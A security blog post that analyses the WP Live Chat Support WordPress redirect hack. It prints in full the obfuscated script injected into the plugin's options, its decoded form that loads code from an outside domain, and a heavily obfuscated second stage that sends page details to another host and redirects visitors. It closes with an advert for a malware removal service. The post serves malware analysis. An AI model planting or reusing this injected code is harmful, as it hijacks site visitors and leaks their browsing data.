Demystifying the WP Live Chat Support WordPress Redirect Hack

The recent WordPress JavaScript Redirect hack took everyone by surprise. The XSS JS injection caused the WP Live Chat Support plugin option to be injected with the following malicious code:

<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

This in turn translates into:

var d = document;
var s = d.createElement('script');
s.type = 'text/javascript';
s.async = true;
var pl = 'https://blackawardago.com';
s.src = pl + '/stat.js?l=11&';
if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}

The injected script further executes a script from an external domain:

var asda324_0x1303 = ['XMOpKMO6CsK/wrjCi8Khw799IcOs', 'w5TDpcKKXMO5dGHDqsKSdENQEg==', 'W8OJwrZqw4x2woHDtMKLNA==', 'wqfDo2TCssOIA8OuQMK2w6nDsio=', 'woTDkcOUA8KmZF0Hw53DtMKEw7Yj', 'w7DCgkfCnMOyesKRcsKEw6AIw4XDh8KtD05Mw7vDvCY=', 'wqDCqcKfUg==', 'P1DCqGnCsMKjwoQcHjtd', 'd3nCt8OMwpUJw6/DuSB5LWQt', 'b8O9d8KyCBM=', 'wq/CtA5T', 'ZsOpCMKqIwEcZS8rw5t7ScK9OA==', 'w6XCmsOcw77CuA==', 'STJp', 'EMO2KcKlCcK4wqDCvcO9w75xDsOqJzEXw6HCkMOXw4lU', 'wqTDvsO8woFSK384', 'w4XCrBBSw4ocWk4Aw6fDr8OtwpsAw5nDg3A=', 'BsKUw4sGVA==', 'wovDi8OFEMK3Y0Y6', 'wrDDt8OhwqVKYA==', 'w67CqsKMW8Obwq7Cq8KTw73DkgDDlcKZwopkwqYXwq3CqH7DmMOdfmA7fTFOw74/w4DCrsKJwqzCmcOsWjnDmgF6wo3Dsl1nUsKwNMOTwpQfw6HCtw=='];
(function (_0x9ba1ca, _0x627fa3) {
    var _0x5a6d17 = function (_0xf41afb) {
        while (--_0xf41afb) {
            _0x9ba1ca['push'](_0x9ba1ca['shift']());
        }
    };
    var _0x5b8b55 = function () {
        var _0xb1b8e4 = {
            'data': {
                'key': 'cookie',
                'value': 'timeout'
            },
            'setCookie': function (_0x5e3390, _0x439f4c, _0x49bcfb, _0x542ade) {
                _0x542ade = _0x542ade || {};
                var _0x580efc = _0x439f4c + '=' + _0x49bcfb;
                var _0x1d6449 = 0x0;
                for (var _0x1d6449 = 0x0, _0x1eed62 = _0x5e3390['length']; _0x1d6449 < _0x1eed62; _0x1d6449++) {
                    var _0x149ebe = _0x5e3390[_0x1d6449];
                    _0x580efc += ';\x20' + _0x149ebe;
                    var _0x8dad4b = _0x5e3390[_0x149ebe];
                    _0x5e3390['push'](_0x8dad4b);
                    _0x1eed62 = _0x5e3390['length'];
                    if (_0x8dad4b !== !![]) {
                        _0x580efc += '=' + _0x8dad4b;
                    }
                }
                _0x542ade['cookie'] = _0x580efc;
            },
            'removeCookie': function () {
                return 'dev';
            },
            'getCookie': function (_0x2fbfb9, _0x2ec0d0) {
                _0x2fbfb9 = _0x2fbfb9 || function (_0x273424) {
                    return _0x273424;
                };
                var _0x1159b3 = _0x2fbfb9(new RegExp('(?:^|;\x20)' + _0x2ec0d0['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
                var _0x1aff37 = function (_0xc8c32e, _0x809377) {
                    _0xc8c32e(++_0x809377);
                };
                _0x1aff37(_0x5a6d17, _0x627fa3);
                return _0x1159b3 ? decodeURIComponent(_0x1159b3[0x1]) : undefined;
            }
        };
        var _0x1b7a3c = function () {
            var _0x24e663 = new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');
            return _0x24e663['test'](_0xb1b8e4['removeCookie']['toString']());
        };
        _0xb1b8e4['updateCookie'] = _0x1b7a3c;
        var _0x24de12 = '';
        var _0x835eba = _0xb1b8e4['updateCookie']();
        if (!_0x835eba) {
            _0xb1b8e4['setCookie'](['*'], 'counter', 0x1);
        } else if (_0x835eba) {
            _0x24de12 = _0xb1b8e4['getCookie'](null, 'counter');
        } else {
            _0xb1b8e4['removeCookie']();
        }
    };
    _0x5b8b55();
}(asda324_0x1303, 0x12e));
var asda324_0x4cb2 = function (_0x29eed8, _0x4bb4aa) {
    _0x29eed8 = _0x29eed8 - 0x0;
    var _0x47e29c = asda324_0x1303[_0x29eed8];
    if (asda324_0x4cb2['NsTdPR'] === undefined) {
        (function () {
            var _0x5c7714 = function () {
                var _0x5a1e24;
                try {
                    _0x5a1e24 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();
                } catch (_0x4137f9) {
                    _0x5a1e24 = window;
                }
                return _0x5a1e24;
            };
            var _0xf95cb6 = _0x5c7714();
            var _0x5efe8a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            _0xf95cb6['atob'] || (_0xf95cb6['atob'] = function (_0xf16509) {
                var _0x2d43da = String(_0xf16509)['replace'](/=+$/, '');
                for (var _0x300004 = 0x0, _0x1c3eba, _0x3627ba, _0x148cc7 = 0x0, _0x376f31 = ''; _0x3627ba = _0x2d43da['charAt'](_0x148cc7++); ~_0x3627ba && (_0x1c3eba = _0x300004 % 0x4 ? _0x1c3eba * 0x40 + _0x3627ba : _0x3627ba, _0x300004++ % 0x4) ? _0x376f31 += String['fromCharCode'](0xff & _0x1c3eba >> (-0x2 * _0x300004 & 0x6)) : 0x0) {
                    _0x3627ba = _0x5efe8a['indexOf'](_0x3627ba);
                }
                return _0x376f31;
            });
        }());
        var _0x3d860b = function (_0x51ef2b, _0x4bb4aa) {
            var _0x2ba463 = [],
                _0x112bcc = 0x0,
                _0x25da2d, _0x214082 = '',
                _0x3d73c5 = '';
            _0x51ef2b = atob(_0x51ef2b);
            for (var _0x392625 = 0x0, _0x1f1a31 = _0x51ef2b['length']; _0x392625 < _0x1f1a31; _0x392625++) {
                _0x3d73c5 += '%' + ('00' + _0x51ef2b['charCodeAt'](_0x392625)['toString'](0x10))['slice'](-0x2);
            }
            _0x51ef2b = decodeURIComponent(_0x3d73c5);
            for (var _0x3eff4a = 0x0; _0x3eff4a < 0x100; _0x3eff4a++) {
                _0x2ba463[_0x3eff4a] = _0x3eff4a;
            }
            for (_0x3eff4a = 0x0; _0x3eff4a < 0x100; _0x3eff4a++) {
                _0x112bcc = (_0x112bcc + _0x2ba463[_0x3eff4a] + _0x4bb4aa['charCodeAt'](_0x3eff4a % _0x4bb4aa['length'])) % 0x100;
                _0x25da2d = _0x2ba463[_0x3eff4a];
                _0x2ba463[_0x3eff4a] = _0x2ba463[_0x112bcc];
                _0x2ba463[_0x112bcc] = _0x25da2d;
            }
            _0x3eff4a = 0x0;
            _0x112bcc = 0x0;
            for (var _0xff0240 = 0x0; _0xff0240 < _0x51ef2b['length']; _0xff0240++) {
                _0x3eff4a = (_0x3eff4a + 0x1) % 0x100;
                _0x112bcc = (_0x112bcc + _0x2ba463[_0x3eff4a]) % 0x100;
                _0x25da2d = _0x2ba463[_0x3eff4a];
                _0x2ba463[_0x3eff4a] = _0x2ba463[_0x112bcc];
                _0x2ba463[_0x112bcc] = _0x25da2d;
                _0x214082 += String['fromCharCode'](_0x51ef2b['charCodeAt'](_0xff0240) ^ _0x2ba463[(_0x2ba463[_0x3eff4a] + _0x2ba463[_0x112bcc]) % 0x100]);
            }
            return _0x214082;
        };
        asda324_0x4cb2['pIQZFe'] = _0x3d860b;
        asda324_0x4cb2['OfdOiw'] = {};
        asda324_0x4cb2['NsTdPR'] = !![];
    }
    var _0x65045d = asda324_0x4cb2['OfdOiw'][_0x29eed8];
    if (_0x65045d === undefined) {
        if (asda324_0x4cb2['ajNdHX'] === undefined) {
            var _0x523b9e = function (_0x4d2a5c) {
                this['GEpTNA'] = _0x4d2a5c;
                this['xkNljo'] = [0x1, 0x0, 0x0];
                this['HnWQpH'] = function () {
                    return 'newState';
                };
                this['HyHfMw'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';
                this['Jyyuco'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
            };
            _0x523b9e['prototype']['DEqELG'] = function () {
                var _0x5aa6c2 = new RegExp(this['HyHfMw'] + this['Jyyuco']);
                var _0x56f50 = _0x5aa6c2['test'](this['HnWQpH']['toString']()) ? --this['xkNljo'][0x1] : --this['xkNljo'][0x0];
                return this['apcbsE'](_0x56f50);
            };
            _0x523b9e['prototype']['apcbsE'] = function (_0x29ffbb) {
                if (!Boolean(~_0x29ffbb)) {
                    return _0x29ffbb;
                }
                return this['bKQVMt'](this['GEpTNA']);
            };
            _0x523b9e['prototype']['bKQVMt'] = function (_0x500164) {
                for (var _0x5874fc = 0x0, _0x4696f6 = this['xkNljo']['length']; _0x5874fc < _0x4696f6; _0x5874fc++) {
                    this['xkNljo']['push'](Math['round'](Math['random']()));
                    _0x4696f6 = this['xkNljo']['length'];
                }
                return _0x500164(this['xkNljo'][0x0]);
            };
            new _0x523b9e(asda324_0x4cb2)['DEqELG']();
            asda324_0x4cb2['ajNdHX'] = !![];
        }
        _0x47e29c = asda324_0x4cb2['pIQZFe'](_0x47e29c, _0x4bb4aa);
        asda324_0x4cb2['OfdOiw'][_0x29eed8] = _0x47e29c;
    } else {
        _0x47e29c = _0x65045d;
    }
    return _0x47e29c;
};
var _0x3762dc = function () {
    var _0x2d8f05 = !![];
    return function (_0x4b81bb, _0x4d74cb) {
        var _0x32719f = _0x2d8f05 ? function () {
            if (_0x4d74cb) {
                var _0x2dc776 = _0x4d74cb['apply'](_0x4b81bb, arguments);
                _0x4d74cb = null;
                return _0x2dc776;
            }
        } : function () {};
        _0x2d8f05 = ![];
        return _0x32719f;
    };
}();
var _0x51ee37 = _0x3762dc(this, function () {
    var _0x546267 = function () {
            return '\x64\x65\x76';
        },
        _0x309aec = function () {
            return '\x77\x69\x6e\x64\x6f\x77';
        };
    var _0x32dbd4 = function () {
        var _0x44795b = new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');
        return !_0x44795b['\x74\x65\x73\x74'](_0x546267['\x74\x6f\x53\x74\x72\x69\x6e\x67']());
    };
    var _0x1142aa = function () {
        var _0x534564 = new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');
        return _0x534564['\x74\x65\x73\x74'](_0x309aec['\x74\x6f\x53\x74\x72\x69\x6e\x67']());
    };
    var _0x30c941 = function (_0x29fb7a) {
        var _0x410fa2 = ~-0x1 >> 0x1 + 0xff % 0x0;
        if (_0x29fb7a['\x69\x6e\x64\x65\x78\x4f\x66']('\x69' === _0x410fa2)) {
            _0x3bbd4b(_0x29fb7a);
        }
    };
    var _0x3bbd4b = function (_0x3f1171) {
        var _0x591a06 = ~-0x4 >> 0x1 + 0xff % 0x0;
        if (_0x3f1171['\x69\x6e\x64\x65\x78\x4f\x66']((!![] + '')[0x3]) !== _0x591a06) {
            _0x30c941(_0x3f1171);
        }
    };
    if (!_0x32dbd4()) {
        if (!_0x1142aa()) {
            _0x30c941('\x69\x6e\x64\u0435\x78\x4f\x66');
        } else {
            _0x30c941('\x69\x6e\x64\x65\x78\x4f\x66');
        }
    } else {
        _0x30c941('\x69\x6e\x64\u0435\x78\x4f\x66');
    }
});
_0x51ee37();
var asda324_0x1feb8b = document;
var asda324_0x4820e9 = asda324_0x1feb8b[asda324_0x4cb2('0x0', 'VH2(')](asda324_0x4cb2('0x1', 'p7VC'));
asda324_0x4820e9[asda324_0x4cb2('0x2', 'Wpa[')] = asda324_0x4cb2('0x3', 'D$[T');
asda324_0x4820e9[asda324_0x4cb2('0x4', 'SlRo')] = !![];
var asda324_0x2fc528 = String['fromCharCode'](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x64, 0x65, 0x73, 0x74, 0x69, 0x6e, 0x79, 0x6c, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x69, 0x6e, 0x66, 0x6f);
asda324_0x4820e9[asda324_0x4cb2('0x5', 'ftp[')] = asda324_0x2fc528 + asda324_0x4cb2('0x6', ']s2[') + encodeURIComponent(document[asda324_0x4cb2('0x7', '(Mk]')]) + asda324_0x4cb2('0x8', '2LZ^') + encodeURIComponent(document[asda324_0x4cb2('0x9', 'fSHN')]) + '&' + window[asda324_0x4cb2('0xa', 'NUI@')][asda324_0x4cb2('0xb', 'oiFB')]['replace']('?', '&') + asda324_0x4cb2('0xc', 'BX94');
if (document[asda324_0x4cb2('0xd', ']s2[')]) {
    document[asda324_0x4cb2('0xe', 'Al0T')][asda324_0x4cb2('0xf', 'YuK2')][asda324_0x4cb2('0x10', 'eRkX')](asda324_0x4820e9, document[asda324_0x4cb2('0x11', 'NUI@')]);
} else {
    asda324_0x1feb8b[asda324_0x4cb2('0x12', 'wuSN')](asda324_0x4cb2('0x13', 'BX94'))[0x0][asda324_0x4cb2('0x14', '(Z#i')](asda324_0x4820e9);
}

The end result is a malicious redirect to random sites advertising you to download software.

WP Live Chat Support plugin as of yesterday had over 60,000+ active installs as per the WordPress plugin repository and was disabled for newer installs.

As a result of this WordPress hack Google flagged many sites as malicious and also disabled Google Ads campaigns of many publishers.

The solution is not just to disable the rogue plugin but also to clean up the WordPress database infection. If you need assistance, you can consider our WP Malware Removal Service.

Fix WordPress Redirect Malware Now! Permanent Removal. Full Cleanup with report.

About the author: Shiv —That which is not…. Shiv is a software security engineer running 18yrs+ into his career.

{ 0 comments… add one }

Leave a Comment